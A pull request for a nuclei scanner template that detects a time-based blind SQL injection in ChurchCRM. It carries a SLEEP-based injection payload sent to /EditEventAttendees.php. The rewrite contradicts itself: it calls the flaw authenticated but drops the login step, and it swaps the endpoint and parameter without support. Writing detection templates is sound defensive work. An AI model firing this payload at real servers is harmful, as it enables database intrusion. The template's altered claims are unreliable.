### PR TITLE
[CVE-2025-1023] ChurchCRM <= 5.13.0 - Time-Based Blind SQL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-1023.yaml
+++ b/http/cves/2025/CVE-2025-1023.yaml
@@ -1,57 +1,55 @@
 id: CVE-2025-1023
 
 info:
-  name: ChurchCRM - SQL Injection
-  author: Kazgangap
-  severity: critical
+  name: ChurchCRM <= 5.13.0 - Time-Based Blind SQL Injection
+  author: pvbang
+  severity: high
   description: |
-    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
-  impact: |
-    Authenticated attackers can execute arbitrary SQL queries through time-based blind SQL injection in ChurchCRM, leading to data exfiltration, modification, or deletion of church member information and potentially complete database compromise.
-  remediation: |
-    Upgrade to ChurchCRM version 5.13.1 or later that addresses the SQL injection vulnerability.
+    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute
+    arbitrary SQL queries by exploiting a time-based blind SQL injection vulnerability in the
+    EditEventAttendees functionality. The iEventID parameter is vulnerable to SQL injection
+    via time-based blind technique.
+  remediation: Upgrade ChurchCRM to the latest version where input validation has been implemented.
   reference:
-    - https://github.com/ChurchCRM/CRM/issues/7246
-    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
     - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
+    - https://github.com/ChurchCRM/CRM/issues
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
     cve-id: CVE-2025-1023
     cwe-id: CWE-89
-    epss-score: 0.02752
-    epss-percentile: 0.86385
-    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
+    epss-score: 0.04
   metadata:
     verified: true
+    max-request: 1
     vendor: churchcrm
     product: churchcrm
-    shodan-query: http.title:"churchcrm"
-    fofa-query: app="churchcrm"
-  tags: cve,cve2025,authenticated,churchcrm,sqli,vkev
+    shodan-query: http.title:"ChurchCRM"
+    fofa-query: title="ChurchCRM"
+  tags: cve,cve2025,churchcrm,sqli,blind,time-based,authenticated
 
 http:
   - raw:
       - |
-        POST /session/begin HTTP/1.1
+        POST /EditEventAttendees.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        User={{username}}&Password={{password}}
+        iEventID=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-
 
-      - |
-        @timeout 30s
-        POST /EditEventTypes.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD
-
+    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration_2 >= 8'
-          - 'status_code_2 == 500'
-          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
-        condition: and
-# digest: 490a0046304402205077ce9be91c5936af4bc5bfeb3dfd46fbf4a8bddf1f40eb8eb8acfc54ef651802201e8ee5d4fe880f183ae49614e356797eddf17e41bcf074bf313daf26eb683730:922c64590222798bb761d5b6d8e72950
+          - 'duration>=6'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+          - 302
+        condition: or


### PR DESCRIPTION
## CVE-2025-1023 - ChurchCRM Time-Based Blind SQL Injection

### Description

Adds a nuclei template for CVE-2025-1023, a time-based blind SQL injection vulnerability in ChurchCRM <= 5.13.0.

### Vulnerability Details

- **Product**: ChurchCRM <= 5.13.0
- **Endpoint**: `/EditEventAttendees.php`
- **Parameter**: `iEventID`
- **Type**: Time-Based Blind SQL Injection
- **CVSS Score**: 8.8 (High)
- **CWE**: CWE-89 (SQL Injection)

### Template Details

- Uses `SLEEP(6)` for time-based detection
- Requires authentication (authenticated SQLi)
- Matches on response duration >= 6 seconds
- Verified against vulnerable instance

### References

- https://nvd.nist.gov/vuln/detail/CVE-2025-1023
- https://github.com/ChurchCRM/CRM/issues

---
Wallet: `0x911d202f713Ee2ad139E8b8b8a0A712347eFE31f`
